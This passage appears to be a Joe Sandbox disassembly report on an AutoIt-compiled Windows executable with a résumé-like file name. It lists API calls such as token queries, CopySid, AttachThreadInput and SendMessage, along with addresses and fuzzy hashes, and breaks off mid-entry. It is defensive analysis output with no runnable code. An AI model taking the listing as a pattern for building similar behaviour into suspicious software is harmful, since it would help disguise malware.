                                                                                        • API String ID: 1157408455-0
                                                                                        • Opcode ID: 4d13d0d1ad8404d08b16c526caf3ea5a9318a2aabdfda96e7b03ef996e2048b4
                                                                                        • Instruction ID: fabd052b2f87818fe0a013512c6b2a3db6a1fa4aed6d2aa13f91efcc398482d8
                                                                                        • Opcode Fuzzy Hash: 4d13d0d1ad8404d08b16c526caf3ea5a9318a2aabdfda96e7b03ef996e2048b4
                                                                                        • Instruction Fuzzy Hash: F4110A72D012287AE72057A5AC4DFABBBBCEF44724F1045AAF504E71C0D2744E848B68
                                                                                        APIs
                                                                                          • Part of subcall function 003BAA62: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 003BAA79
                                                                                          • Part of subcall function 003BAA62: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 003BAA83
                                                                                          • Part of subcall function 003BAA62: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 003BAA92
                                                                                          • Part of subcall function 003BAA62: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 003BAA99
                                                                                          • Part of subcall function 003BAA62: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 003BAAAF
                                                                                        • GetLengthSid.ADVAPI32(?,00000000,003BADE4,?,?), ref: 003BB21B
                                                                                        • GetProcessHeap.KERNEL32(00000008,00000000), ref: 003BB227
                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 003BB22E
                                                                                        • CopySid.ADVAPI32(?,00000000,?), ref: 003BB247
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: Heap$AllocInformationProcessToken$CopyErrorLastLength
                                                                                        • String ID:
                                                                                        • API String ID: 4217664535-0
                                                                                        • Opcode ID: f49f36369c479f46a64f9f4bb377f8d1878b303ec4a56e8da07b3e6739459643
                                                                                        • Instruction ID: dc3cb2a04e677ac0c133459cae4aa69d17497fdeff8847c9036602603b956e17
                                                                                        • Opcode Fuzzy Hash: f49f36369c479f46a64f9f4bb377f8d1878b303ec4a56e8da07b3e6739459643
                                                                                        • Instruction Fuzzy Hash: 7C119171A00205EFDB059F98DD85AEEB7A9EF85308F15842DEA42AB610DB71AE44CB10
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 003BB498
                                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 003BB4AA
                                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 003BB4C0
                                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 003BB4DB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: MessageSend
                                                                                        • String ID:
                                                                                        • API String ID: 3850602802-0
                                                                                        • Opcode ID: 3d90c72899f466fa5e9624fb31e5c5fb284c4b6cca11ffbfcb6c586cfc8a78a6
                                                                                        • Instruction ID: 26006cf90cfed6b744b6c372a6a46b1493e0efb347de1c21a942525a77f6bb95
                                                                                        • Opcode Fuzzy Hash: 3d90c72899f466fa5e9624fb31e5c5fb284c4b6cca11ffbfcb6c586cfc8a78a6
                                                                                        • Instruction Fuzzy Hash: 6511187A900218FFDB11DFA9C985EDDBBB8FB08714F204091E604B7295DB71AE11DB94
                                                                                        APIs
                                                                                          • Part of subcall function 0039B34E: GetWindowLongW.USER32(?,000000EB), ref: 0039B35F
                                                                                        • DefDlgProcW.USER32(?,00000020,?,00000000), ref: 0039B5A5
                                                                                        • GetClientRect.USER32(?,?), ref: 003FE69A
                                                                                        • GetCursorPos.USER32(?), ref: 003FE6A4
                                                                                        • ScreenToClient.USER32(?,?), ref: 003FE6AF
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: Client$CursorLongProcRectScreenWindow
                                                                                        • String ID:
                                                                                        • API String ID: 4127811313-0
                                                                                        • Opcode ID: 7f6883261c3a5ca4dc3fa81e51c87c380f699e4c3af766e8936dc8cd0ce2daf9
                                                                                        • Instruction ID: 4a450eef278574a949a3be1edc65f3afe1e3fc0e027ca5a78ddc1b22ab59b469
                                                                                        • Opcode Fuzzy Hash: 7f6883261c3a5ca4dc3fa81e51c87c380f699e4c3af766e8936dc8cd0ce2daf9
                                                                                        • Instruction Fuzzy Hash: E9113635900029BBDF11EF98DE859AEB7B9EF09304F420461E901E7150D734AA85CBA5
                                                                                        APIs
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 003C7352
                                                                                        • MessageBoxW.USER32(?,?,?,?), ref: 003C7385
                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 003C739B
                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 003C73A2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                        • String ID:
                                                                                        • API String ID: 2880819207-0
                                                                                        • Opcode ID: afe15a5027e973ebf8057320a59db7f9ccbff77f5be01bed0741dfb3ee9e4dea
                                                                                        • Instruction ID: caadac11534c18fa580f84fc9ad44a6795fbcbda93ffd71d7ebaaca7622e03db
                                                                                        • Opcode Fuzzy Hash: afe15a5027e973ebf8057320a59db7f9ccbff77f5be01bed0741dfb3ee9e4dea
                                                                                        • Instruction Fuzzy Hash: D7110876A04254BFC7029FACDC09FDE7BADAB45321F044369FC21E3251D6B08D049BA4
                                                                                        APIs
                                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0039D1BA
                                                                                        • GetStockObject.GDI32(00000011), ref: 0039D1CE
                                                                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 0039D1D8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: CreateMessageObjectSendStockWindow
                                                                                        • String ID:
                                                                                        • API String ID: 3970641297-0
                                                                                        • Opcode ID: 3f10a554855db268ea8aa2dda817defb9ca96419cf096b53390528a68f7f39fe
                                                                                        • Instruction ID: 150dd48dc400b4a2afb919b756f21babc17f911cc82f8a286893bc6ceeab5f84
                                                                                        • Opcode Fuzzy Hash: 3f10a554855db268ea8aa2dda817defb9ca96419cf096b53390528a68f7f39fe
                                                                                        • Instruction Fuzzy Hash: 5211A973501509BFEF024FA0DC52EEABB6DFF09364F050122FA1666060C732DC60ABA0
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                        • String ID:
                                                                                        • API String ID: 3016257755-0
                                                                                        • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                                        • Instruction ID: 950ecb939c48f08628ef334fbbe285e5c4ed4f9a1e5c646f2f6a253f214938dd
                                                                                        • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                                        • Instruction Fuzzy Hash: 3F01493600014EBBCF135E84DC018EE3F67BB18358B598455FF2859932D336DAB2AB89
                                                                                        APIs
                                                                                          • Part of subcall function 003A7A0D: __getptd_noexit.LIBCMT ref: 003A7A0E
                                                                                        • __lock.LIBCMT ref: 003A748F
                                                                                        • InterlockedDecrement.KERNEL32(?), ref: 003A74AC
                                                                                        • _free.LIBCMT ref: 003A74BF
                                                                                        • InterlockedIncrement.KERNEL32(01855248), ref: 003A74D7
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                                                                        • String ID:
                                                                                        • API String ID: 2704283638-0
                                                                                        • Opcode ID: f23fc067e2d17dcbccc888213e615b9a865d70f060ef2621fc1ae83d75559d05
                                                                                        • Instruction ID: 976afb5a07bb40bbfb7ed8886ffde59fef9cb49264dc82d9d63f6815722695a1
                                                                                        • Opcode Fuzzy Hash: f23fc067e2d17dcbccc888213e615b9a865d70f060ef2621fc1ae83d75559d05
                                                                                        • Instruction Fuzzy Hash: 4001D631949A11ABC713AF669D8A75DBB60FF0A721F164029F854AB680C7345901CFD6
                                                                                        APIs
                                                                                          • Part of subcall function 0039AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0039AFE3
                                                                                          • Part of subcall function 0039AF83: SelectObject.GDI32(?,00000000), ref: 0039AFF2
                                                                                          • Part of subcall function 0039AF83: BeginPath.GDI32(?), ref: 0039B009
                                                                                          • Part of subcall function 0039AF83: SelectObject.GDI32(?,00000000), ref: 0039B033
                                                                                        • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 003EEA8E
                                                                                        • LineTo.GDI32(00000000,?,?), ref: 003EEA9B
                                                                                        • EndPath.GDI32(00000000), ref: 003EEAAB
                                                                                        • StrokePath.GDI32(00000000), ref: 003EEAB9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                        • String ID:
                                                                                        • API String ID: 1539411459-0
                                                                                        • Opcode ID: 305f947be6efedb0b7bec2db54ce524d486e7cbb3fe2488e5111aef06b55b418
                                                                                        • Instruction ID: 40e4b9b35b5c65611eef44c90805c1fe9cca8b21b2766b2df5a9e402e488a6d8
                                                                                        • Opcode Fuzzy Hash: 305f947be6efedb0b7bec2db54ce524d486e7cbb3fe2488e5111aef06b55b418
                                                                                        • Instruction Fuzzy Hash: BDF0BE31401268BBEB139F94AD09FCE3F19AF06310F044211FE02640E187749565CBD9
                                                                                        APIs
                                                                                        • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 003BC84A
                                                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 003BC85D
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 003BC864
                                                                                        • AttachThreadInput.USER32(00000000), ref: 003BC86B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                        • String ID:
                                                                                        • API String ID: 2710830443-0
                                                                                        • Opcode ID: 6ac2649ac463ff1b20cce3f7d41793caa3ffb70f714af6c6b8462c5dfe9c8342
                                                                                        • Instruction ID: bdd215af841be757371926c7a975e313fb7ce9efd47526833a0d628b6d798bd9
                                                                                        • Opcode Fuzzy Hash: 6ac2649ac463ff1b20cce3f7d41793caa3ffb70f714af6c6b8462c5dfe9c8342
                                                                                        • Instruction Fuzzy Hash: F3E06D71942228BADB211FA2DD0DEDB7F1CEF167A1F008421B60DE5861C6B2C584CBE0
                                                                                        APIs
                                                                                        • GetCurrentThread.KERNEL32 ref: 003BB0D6
                                                                                        • OpenThreadToken.ADVAPI32(00000000,?,?,?,003BAC9D), ref: 003BB0DD
                                                                                        • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,003BAC9D), ref: 003BB0EA
                                                                                        • OpenProcessToken.ADVAPI32(00000000,?,?,?,003BAC9D), ref: 003BB0F1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: CurrentOpenProcessThreadToken
                                                                                        • String ID:
                                                                                        • API String ID: 3974789173-0
                                                                                        • Opcode ID: d7902a6f50bc720a7c53845c9593b6afda91525f2fc3efeca4a4f33636941b7a
                                                                                        • Instruction ID: 5ea07c8f24d03c52ddfbffed310f8d22ecd95cdfb8e418fe36981161110078e6
                                                                                        • Opcode Fuzzy Hash: d7902a6f50bc720a7c53845c9593b6afda91525f2fc3efeca4a4f33636941b7a
                                                                                        • Instruction Fuzzy Hash: 53E04F72A012119BD7202FF15E0CB977BA8AF55799F028828A745EA040DB7484058764
                                                                                        APIs
                                                                                        • GetSysColor.USER32(00000008), ref: 0039B496
                                                                                        • SetTextColor.GDI32(?,000000FF), ref: 0039B4A0
                                                                                        • SetBkMode.GDI32(?,00000001), ref: 0039B4B5
                                                                                        • GetStockObject.GDI32(00000005), ref: 0039B4BD
                                                                                        • GetWindowDC.USER32(?,00000000), ref: 003FDE2B
                                                                                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 003FDE38
                                                                                        • GetPixel.GDI32(00000000,?,00000000), ref: 003FDE51
                                                                                        • GetPixel.GDI32(00000000,00000000,?), ref: 003FDE6A
                                                                                        • GetPixel.GDI32(00000000,?,?), ref: 003FDE8A
                                                                                        • ReleaseDC.USER32(?,00000000), ref: 003FDE95
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                                        • String ID:
                                                                                        • API String ID: 1946975507-0
                                                                                        • Opcode ID: 1a4a26415ec6b225214e05ac3fe58c41a1131146b623202c3a81d4a5dd8beb65
                                                                                        • Instruction ID: b6ea9cfb6274ad76b7fba3b9db683fb22388ceea1e85ea57b4b6c6fe96e564db
                                                                                        • Opcode Fuzzy Hash: 1a4a26415ec6b225214e05ac3fe58c41a1131146b623202c3a81d4a5dd8beb65
                                                                                        • Instruction Fuzzy Hash: FCE06D31500244AADF221FA4AD0DBE83F11AB55339F00C226FB696C0E2C7714584DB11
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: CapsDesktopDeviceReleaseWindow
                                                                                        • String ID:
                                                                                        • API String ID: 2889604237-0
                                                                                        • Opcode ID: 2ab95a868bf964a40117ff45cbf52f7aedb39bef3fc29957b92ad122bce3f160
                                                                                        • Instruction ID: 3af33ece3c13b68723aa37cd3996492cb0a585b73acd2c17ed3af5ce6ba61dee
                                                                                        • Opcode Fuzzy Hash: 2ab95a868bf964a40117ff45cbf52f7aedb39bef3fc29957b92ad122bce3f160
                                                                                        • Instruction Fuzzy Hash: 90E04FB1900204EFDB015FB0C94862E7BA8EB4C350F11CC25FD5A9B210CB7598448F44
                                                                                        APIs
                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 003BB2DF
                                                                                        • UnloadUserProfile.USERENV(?,?), ref: 003BB2EB
                                                                                        • CloseHandle.KERNEL32(?), ref: 003BB2F4
                                                                                        • CloseHandle.KERNEL32(?), ref: 003BB2FC
                                                                                          • Part of subcall function 003BAB24: GetProcessHeap.KERNEL32(00000000,?,003BA848), ref: 003BAB2B
                                                                                          • Part of subcall function 003BAB24: HeapFree.KERNEL32(00000000), ref: 003BAB32
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                        • String ID:
                                                                                        • API String ID: 146765662-0
                                                                                        • Opcode ID: 5949fc9453f4adee1395895c6144c050df719a2768dfc2e9d12730585709e7d4
                                                                                        • Instruction ID: 3187f546ffebe7685ba05860e48ab7d4235ba9b4de6dd5b7a7ef6486be64e027
                                                                                        • Opcode Fuzzy Hash: 5949fc9453f4adee1395895c6144c050df719a2768dfc2e9d12730585709e7d4
                                                                                        • Instruction Fuzzy Hash: 09E0EC3A504405BFCB026FE5ED08859FFB6FF883213109231FA2591571CB32A875EB95
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: CapsDesktopDeviceReleaseWindow
                                                                                        • String ID:
                                                                                        • API String ID: 2889604237-0
                                                                                        • Opcode ID: d6b37667f542aacce34637b08ff9f9e1af95e0490f4fae4b1779978426c11d10
                                                                                        • Instruction ID: 6dc1e09dacfc24e86771a6b41ed8f633ae27ebbfe34509d76f9257892a774d57
                                                                                        • Opcode Fuzzy Hash: d6b37667f542aacce34637b08ff9f9e1af95e0490f4fae4b1779978426c11d10
                                                                                        • Instruction Fuzzy Hash: 9FE046B1900200EFDF015FB0C94862E7BA8EB4C350F118829F95EAB220CB7A98448F08
                                                                                        APIs
                                                                                        • OleSetContainedObject.OLE32(?,00000001), ref: 003BDEAA
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: ContainedObject
                                                                                        • String ID: AutoIt3GUI$Container
                                                                                        • API String ID: 3565006973-3941886329
                                                                                        • Opcode ID: 5cc8e016be22b3ef53e8c0c64ae18c544906ec8a3c753e2deeeb1ecd35872eab
                                                                                        • Instruction ID: e663cb77ac1127e8f041b8a2b5c5a11d38d505091d1b999b7ebb228abaf68fd0
                                                                                        • Opcode Fuzzy Hash: 5cc8e016be22b3ef53e8c0c64ae18c544906ec8a3c753e2deeeb1ecd35872eab
                                                                                        • Instruction Fuzzy Hash: DE913A706006019FDB15DF64C884BAAB7F9BF49718F20846EF94ACFA91EB70E841CB50
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcscpy
                                                                                        • String ID: I/?$I/?
                                                                                        • API String ID: 3048848545-1830153238
                                                                                        • Opcode ID: 88dfdb524e9d45900ed7a20722aa58de949687d2b7979f4fca71de7ff0cb1198
                                                                                        • Instruction ID: d20bd2dcb90bcffae3ffc9abddbfa3ec27ad65bc18623a45b259a32e6f6ae43b
                                                                                        • Opcode Fuzzy Hash: 88dfdb524e9d45900ed7a20722aa58de949687d2b7979f4fca71de7ff0cb1198
                                                                                        • Instruction Fuzzy Hash: C141B035900616AACF26EF98C441FFEB7B0EF49710F51505EE881EB191DB306E92C7A4
                                                                                        APIs
                                                                                        • Sleep.KERNEL32(00000000), ref: 0039BCDA
                                                                                        • GlobalMemoryStatusEx.KERNEL32 ref: 0039BCF3
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: GlobalMemorySleepStatus
                                                                                        • String ID: @
                                                                                        • API String ID: 2783356886-2766056989
                                                                                        • Opcode ID: 3520c433c7f8212b53285bdb00a5e7f905a52b88d897a1c43839da56aa272fe1
                                                                                        • Instruction ID: 9acb49a90b65f362c318c4df0a597934f11f96c38b568e3cebd0dca395e56851
                                                                                        • Opcode Fuzzy Hash: 3520c433c7f8212b53285bdb00a5e7f905a52b88d897a1c43839da56aa272fe1
                                                                                        • Instruction Fuzzy Hash: 43514672409B44ABE721AF14DC86BAFBBECFF94354F41485EF1C8450A2DB7085A8CB56
                                                                                        APIs
                                                                                          • Part of subcall function 003844ED: __fread_nolock.LIBCMT ref: 0038450B
                                                                                        • _wcscmp.LIBCMT ref: 003CC65D
                                                                                        • _wcscmp.LIBCMT ref: 003CC670
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcscmp$__fread_nolock
                                                                                        • String ID: FILE
                                                                                        • API String ID: 4029003684-3121273764
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 003EA85A
                                                                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 003EA86F
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: MessageSend
                                                                                        • String ID: '
                                                                                        • API String ID: 3850602802-1997036262
                                                                                        APIs
                                                                                        • DestroyWindow.USER32(?,?,?,?), ref: 003E980E
                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 003E984A
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: Window$DestroyMove
                                                                                        • String ID: static
                                                                                        • API String ID: 2139405536-2160076837
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 003C51C6
                                                                                        • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 003C5201
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: InfoItemMenu_memset
                                                                                        • String ID: 0
                                                                                        • API String ID: 2223754486-4108050209
                                                                                        APIs
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: __snwprintf
                                                                                        • String ID: , $$AUTOITCALLVARIABLE%d
                                                                                        • API String ID: 2391506597-2584243854
                                                                                        APIs
                                                                                        • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 003E945C
                                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 003E9467
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: MessageSend
                                                                                        • String ID: Combobox
                                                                                        • API String ID: 3850602802-2096851135
                                                                                        APIs
                                                                                          • Part of subcall function 0039B34E: GetWindowLongW.USER32(?,000000EB), ref: 0039B35F
                                                                                        • GetActiveWindow.USER32 ref: 003EDA7B
                                                                                        • EnumChildWindows.USER32(?,003ED75F,00000000), ref: 003EDAF5
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: Window$ActiveChildEnumLongWindows
                                                                                        • String ID: T1=
                                                                                        • API String ID: 3814560230-180425949
                                                                                        APIs
                                                                                          • Part of subcall function 0039D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0039D1BA
                                                                                          • Part of subcall function 0039D17C: GetStockObject.GDI32(00000011), ref: 0039D1CE
